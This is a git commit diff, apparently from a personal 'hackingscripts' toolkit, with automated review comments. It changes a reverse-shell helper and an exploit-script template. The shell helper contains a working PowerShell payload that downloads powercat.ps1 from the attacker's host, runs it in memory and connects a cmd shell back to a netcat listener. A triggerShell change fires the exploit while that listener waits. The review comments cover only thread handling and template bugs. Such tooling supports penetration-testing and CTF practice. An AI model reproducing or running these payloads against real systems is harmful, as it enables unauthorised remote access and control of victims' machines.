Roman Hergenreder 2021-06-11 12:44:35 +02:00
parent 29d5f63c58
commit 1891efe2e4
2 changed files with 16 additions and 7 deletions

@ -4,6 +4,8 @@ import socket
import sys import sys
import pty import pty
import util import util
import time
import threading
def generatePayload(type, local_address, port): def generatePayload(type, local_address, port):
@ -29,7 +31,11 @@ def generatePayload(type, local_address, port):
return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port) return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
def triggerShell(func, port): def triggerShell(func, port):
def _wait_and_exec():
time.sleep(1.5)
func() func()
threading.Thread(target=_wait_and_exec).start()
pty.spawn(["nc", "-lvvp", str(port)]) pty.spawn(["nc", "-lvvp", str(port)])
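Review bot: The helper thread added in `triggerShell` is non-daemon and has no error handling, so if `func()` raises, the traceback goes to the thread's excepthook while `pty.spawn` keeps the listener blocking with no indication that the trigger never fired. The 1.5-second sleep is also a hard-coded guess about how long the listener takes to start. I would at least mark the thread as daemon and expose the delay, `def triggerShell(func, port, delay=1.5):` with `time.sleep(delay)` and `threading.Thread(target=_wait_and_exec, daemon=True).start()`, and add a docstring noting that `func` runs on a separate thread after `delay` seconds and that exceptions inside it are not propagated to the caller. `generatePayload` begins outside the first hunk, and the `@ -4,6 +4,8` hunk only touches its import block.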

@ -5,21 +5,23 @@ import sys
def generateTemplate(baseUrl): def generateTemplate(baseUrl):
template = """#!/usr/bin/env python template = """#!/usr/bin/env python
import requests import sys
import base64
import json import json
import base64
import requests
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
from hackingscripts import util, fileserver from hackingscripts import util, fileserver
from urllib3.exceptions import InsecureRequestWarning from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
BASE_URL = "%s" BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
def login(username, password): def login(username, password):
# Template method to create a session # Template method to create a session
session = requests.Session() session = requests.Session()
post_data = { "username": username, "password": password } post_data = { "username": username, "password": password }
res = ression.post(BASE_URL + "/login", data=post_data, allow_redirects=False) res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home": if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
print("Login failed") print("Login failed")
exit() exit()
@ -29,8 +31,9 @@ def exploit(session, payload):
# Template method to exploit an endpoint # Template method to exploit an endpoint
pass pass
session = login() if __name__ == "__main__":
exploit(session, "id") session = login()
exploit(session, "id")
""" % baseUrl """ % baseUrl
return template return template
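Review bot: The new `__main__` guard still calls `session = login()` with no arguments even though the template defines `def login(username, password)`, so the generated script raises a TypeError before reaching `exploit` unless the user edits both places. Since this is a template, either give the parameters defaults the user is expected to replace, `def login(username="USERNAME", password="PASSWORD"):`, or pass placeholders at the call site and say so in a comment. The template now imports `sys`, so the `exit()` on the failed-login branch could become `sys.exit(1)` to return a non-zero status instead of relying on the site builtin. Note also that the whole template goes through `% baseUrl`, so a `baseUrl` containing a literal `%` would break formatting; a short comment on `generateTemplate` stating that constraint would help.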